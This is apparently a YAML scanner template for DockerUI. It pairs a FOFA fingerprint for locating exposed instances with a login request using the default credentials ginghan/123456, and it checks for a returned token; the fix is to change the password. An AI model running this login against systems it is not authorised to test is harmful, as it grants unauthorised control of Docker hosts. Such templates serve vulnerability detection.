product: DockerUI
vName: DockerUI 默认口令登录
type: 默认口令/弱口令
vID: [ ]
level: 3
vDesc: Docker图形化页面：DockerUI存在默认账户ginghan/123456
version: ''
note: ''
search:
  FOFA: icon_hash="-1005772311"
protocol: http
link: https://mp.weixin.qq.com/s/_NtFZ1MdmfU7hcl4rgdzDQ
fix:
  - 更改密码即可
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /login
      data: username=ginghan&grant_type=password&password=123456&practicetype=
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - userid
              - token
            logic: and